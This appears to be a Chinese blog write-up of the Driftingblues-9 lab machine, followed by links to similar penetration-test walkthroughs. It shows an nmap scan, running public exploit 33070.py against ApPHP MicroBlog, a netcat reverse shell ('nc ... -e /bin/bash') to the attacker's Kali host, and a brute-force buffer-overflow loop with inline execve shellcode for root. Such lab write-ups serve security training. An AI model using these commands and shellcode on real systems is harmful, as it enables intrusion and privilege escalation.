Hackmyvm综合靶机 | Driftingblues-9(完结)

最新推荐文章于 2023-05-30 11:30:00 发布
最新推荐文章于 2023-05-30 11:30:00 发布
阅读量615 收藏
点赞数 1
分类专栏: # 靶场WP 文章标签: web安全 靶机渗透 安全 提权 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45996361/article/details/124183477
版权

前言提要

终于把这个系列的靶机打完了,后面会做一个小总结,近期暂时会把靶机练习放一段时间往其他知识点上去学习学习…
老实说感觉自己打了这一段的时间的靶机了,每次都会有新的问题也会get新的知识,究于还是自己的深度没有到一定位置,我的前路还有一篇宝藏等着我去挖掘!!!!
比如这个靶机其实十分简单但我不会缓冲区溢出(后续会去了解…)

kali:192.168.132.139

靶机IP:192.168.132.178

信息收集

nmap -A -sV -p- -T4 192.168.132.178

image-20220414213555562

web页面有一个后台管理员登陆口

This script was generated by ApPHP MicroBlog v.1.0.1

搜索一下相关漏洞

searchsploit ApPHP MicroBlog 1.0.1
searchsploit -m 33070.py
cat 33070.py

image-20220414215754558

python2 33070.py http://192.168.132.178/index.php

发现一处账号密码,反弹shell试试、

kali:rlwrap nc -lvnp 1234
nc 192.168.132.139 1234 -e /bin/bash

发现有 clapton 用户,和数据库中的用户一样,尝试登录一下 clapton 用户

image-20220414220437850

提示缓冲区溢出,并给出俩个案例

https://www.tenouk.com/Bufferoverflowc/Bufferoverflow6.html
https://samsclass.info/127/proj/lbuf1.htm

缓冲区溢出提权(我不会)

这里带师傅链接:https://www.cnblogs.com/sainet/p/15789449.html

for i in {1..10000}; do (./input $(python -c 'print("A" * 171 + "\xe0\x13\x8b\xbf" + "\x90"* 1000 + "\x31\xc9\xf7\xe1\x51\xbf\xd0\xd0\x8c\x97\xbe\xd0\x9d\x96\x91\xf7\xd7\xf7\xd6\x57\x56\x89\xe3\xb0\x0b\xcd\x80")')); done

image-20220414220834679

1erkeU
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
关于HackMyMV靶场的靶机网络配置与下载
weixin_58368471的博客
06-10 907
BOX的适配问题
Hackmyvm综合靶机 | Driftingblues-1
IerkeU的博客
04-01 3171
前提概要 靶场地址:https://www.vulnhub.com/entry/driftingblues-1,625/,是一个极其简单的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / nmap下的工具) 二珂说:这个靶机系列是跟着新仔一起入坑的,他太卷了,咱们也不能速度太慢了!!!后面还会再次复习DC靶机的实现过程… 信息收集 arp-scan 192.168.132.0/24 之前都是扫出目标后就之间nmap一把梭 后面了解到这样容易暴露目标 所以
web综合靶场-LazysysAdmin
qq_62638044的博客
04-02 591
查找现有的(和/或隐藏的)Web对象,通过对Web服务器发起基于字典的攻击并分析响应的数据。采用递归的方式来获取更多的目录,它还支持代理和http认证限制访问的网站,其中:-t指定文件系统类型,i表示internet,f表示file,s表示system,-o描述设备或者档案的挂接方式。对主机进行端口扫描,发现开放了22,80,139,445,3306,6667端口。在配置文件中,含有目标主机服务器的各项配置信息,若被攻击者看到,风险极高。尝试使用用户名:togie,密码:12345,并未登录成功;
B-4:Web 安全综合渗透测试
JJH2724719395的博客
02-02 1891
Web 安全综合渗透测试
kali渗透综合靶机(十五)--Breach-1.0靶机
W小哥
04-01 2209
一、靶机下载 下载链接:https://download.vulnhub.com/breach/Breach-1.0.zip 二、Breach-1.0靶机搭建 将下载好的靶机环境,用VMware导入即可使用,文件->打开 导入到合适位置即可,默认是C盘,成功导入虚拟机之后,打开即可 三、攻击过程 VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为ho...
综合靶机渗透测试解析
最新发布
w_j_x_123的博客
05-30 559
7.root家目录下存在一个***.txt文件,文件名+文件内容当作flag提交,用+号连接(例:***.txt+qwoingqwoighoqisfhoasf)7.root家目录下存在一个***.txt文件,文件名+文件内容当作flag提交,用+号连接(例:***.txt+qwoingqwoighoqisfhoasf)6.在kali中搜索该提权漏洞,并将漏洞的披露时间当作flag值提交.(例:2023-05-26);1. 扫描目标靶机靶机开放的所有端口,当作 flag 提交(例:21,22,23)
2021-12-16 综合靶机实验
夕阳的街道的博客
12-16 2883
一、实验题目:综合靶机实验 二、实验内容: 1.使用msf搜索可利用漏洞(drupal) 2. 寻找目标网站的配置文件 3.数据库管理员提权(更新管理员密码或者添加一个新用户) 4. suid提权的命令(nmap、vim、find、bash、more、less、nano、cp) 三、实验环境: 1.kali虚拟机:192.168.112.130 2. 靶机:192.168.112.138 四、实验步骤: 1.搜索存活靶机,输入命令: masscan 网段 -p 80 ..
Hackmyvm综合靶机 | Driftingblues-4
IerkeU的博客
04-11 1856
Driftingblues-4靶机过程记录
kali渗透综合靶机(十六)--evilscience靶机
W小哥
04-02 1043
https://download.vulnhub.com/theether/theEther_1.0.1.zip
kali渗透综合靶机(十二)--SickOs1.2靶机
W小哥
03-30 1622
一、靶机下载 下载链接:https://download.vulnhub.com/sickos/sick0s1.2.zip 二、SickOs1.2靶机搭建 将下载好的靶机环境,用VMware导入即可使用,文件->打开 导入到合适位置即可,默认是C盘,成功导入虚拟机之后,打开即可 三、攻击过程 kali IP:192.168.212.6 靶机IP:192.168.212.9 1、主机发...
kali渗透综合靶机(二)--bulldog靶机
W小哥
03-07 1004
一、靶机下载 靶机下载地址:https://download.vulnhub.com/bulldog/bulldog.ova 二、bulldog靶机搭建 靶机: 将下载好的靶机环境,用VM VirtualBox导入即可使用,管理->导入虚拟电脑 设置网络模式,网卡选择仅主机模式 kali攻击机: 点开vmware中的虚拟选项编辑器中 点击更改设置,让vmware桥接至VirtualBox...
Hack The Box 系列域渗透靶机Cascade
FreeBuf_的博客
12-09 791
本小白最近在学域渗透,决定把Hack The Box的Active Directory 101 系列域渗透靶机打完,并详细记录当中用到的工具、知识点及其背后的原理。本篇文章是该系列的第八篇,靶机名字为Cascade。
HackMyvm靶机系列(3)-visions
qq_70727026的博客
05-12 1101
一、信息收集 先探测网段,得到目标主机 nmap -sP 192.168.200.0/24 | grep -i -B 2 virtualbox 然后进行端口扫描,发现ssh服务和http服务 nmap -sC -sV -p- 192.168.200.234 访问一下http服务,发现只有一张图片和一段注释。 这段注释看上去是一个提示,aliccia猜测可能是一个用户 使用dirsearch扫描一下目录,看看能有什么收获不 dirsearch -u http://19..
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 (附靶机搭建教程)
qq_51577576的博客
03-14 8235
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
kali渗透综合靶机(十三)--Dina 1.0靶机
WY92139010的博客
06-03 699
kali渗透综合靶机(十三)--Dina 1.0靶机 一、主机发现 1.netdiscover -i eth0 -r 192.168.10.0/24    二、端口扫描 1. masscan --rate=10000 -p0-65535 192.168.10.181    三、端口服务识别 1. nmap -sV -T4 -O -p ,80 192.168.10.181 ...
靶机渗透练习09-driftingblues9
Force~
04-01 3365
靶机地址: https://www.vulnhub.com/entry/driftingblues-9-final,695/ 1、主机探活 arp-scan -I eth0 -l (指定网卡扫) 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息) masscan 192.168.111.0/24 -p 80,22 (masscan 扫描的网段 -p 扫描端口号) netdiscover -i eth0 -r 192.168.184.0/24 (netdiscover -i 网卡-r 网段) n.
kali渗透综合靶机(六)--FristiLeaks靶机
W小哥
03-11 1425
一、靶机下载 下载链接:https://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova 二、FristiLeaks靶机搭建 将下载好的靶机环境,用VMware导入即可使用,文件->打开 导入到合适位置即可,默认是C盘,成功导入虚拟机之后,打开即可 三、攻击过程 kali IP:192.168.27.128 靶机IP:192.1...
看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-9
Aluxian_的博客
07-01 976
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这期更新一下Vulnhub DriftingBlues 系列 还是老样子找到FLAG即可,可能比较偏向CTF点。官网地址:https://www.vulnhub.com/entry/driftingblues-9-final,695/ 下载好了把安装包解压 然后试用VMware即可。kali里使用发现主机 渗透机:kali IP :192.16
靶机渗透练习08-driftingblues9
hirak0的博客
04-14 555
靶机描述 靶机地址:https://www.vulnhub.com/entry/driftingblues-9-final,695/ Description get flags difficulty: easy about vm: tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email for troubleshooting or questions. 一、搭
例举使用Nmap工具对靶机Metasploitable2-XP和Metasploitable2-Linux进行端口扫描
05-26
Nmap是一款强大的网络发现和安全审计工具,可以用来扫描目标主机的端口和服务,以确定其漏洞和安全风险。 以下是使用Nmap工具对Metasploitable2-XP和Metasploitable2-Linux进行端口扫描的步骤: ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

1erkeU

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值